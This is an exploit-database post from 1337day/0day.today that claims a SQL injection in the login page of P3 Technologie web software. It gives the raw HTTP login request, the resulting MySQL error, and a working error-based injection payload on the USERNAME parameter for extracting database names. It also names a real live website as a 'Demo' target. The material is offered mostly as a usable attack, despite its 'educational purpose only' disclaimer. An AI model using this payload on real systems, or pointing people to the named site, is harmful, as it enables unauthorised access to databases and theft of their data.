P3 Technologie SQL Injection Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Caddy-dz member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
####
# Exploit Title: P3 Technologie SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: http://www.facebook.com/ALG.Cyber.Army
# E-mail: [email protected] 
# Category:: webapps
# script home : http://www.p3.ie/
# Security Risk: high
# Tested on: Back|Track 5 KDE / French
####
# this was written for educational purpose only. use it at your own risk.
# author will be not responsible for any damage caused! user assumes all responsibility 
# intended for authorized web application pentesting only!

[*] Vulnerable file : login.php

[*] POST / GET :

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/admin/login.php
Cookie: PHPSESSID=c5a1n388sda8l9m85qb7rpgeh1
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
action=LOGIN&USERNAME=a&PASSWORD=a&submit=Submit

[*] Proof Of Concept :

we got sql error when we try to login with username = '  / password = '
--> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 
'PASSWORD";s:32:"3590cb8af0bbb9e78c343b52b93773c9";s:6:"submit";s:6:"Submit";s:9:' at line 1

[*] USERNAME PARAMETRE : is vulnerable to sql injection , so we gonna inject on it

# http://localhost//admin/login.php?action=LOGIN&USERNAME=a' (SQLi Here) &PASSWORD=a&submit=Submit

[*] Payload :

# fetching database names :
Payload: action=LOGIN&USERNAME=a' AND (SELECT 5048 FROM(SELECT COUNT(*),CONCAT(CHAR(58,115,122,101,58),(SELECT (CASE WHEN (5048=5048) THEN 1 ELSE 0 END)),CHAR(58,97,121,100,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'dLLZ'='dLLZ&PASSWORD=a&submit=Submit

[*] Demo :

https://www.ireshotels.com/admin/login.php


# Greets To : ==============================================================================
#  The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates , 
#  D4NB4R , Inj3ct0r Team , jos_ali_joe , exploit-id team , OWASP Algeria
#  ... And All Algerian Hax0rs
============================================================================================

#  0day.today [2018-01-01]  #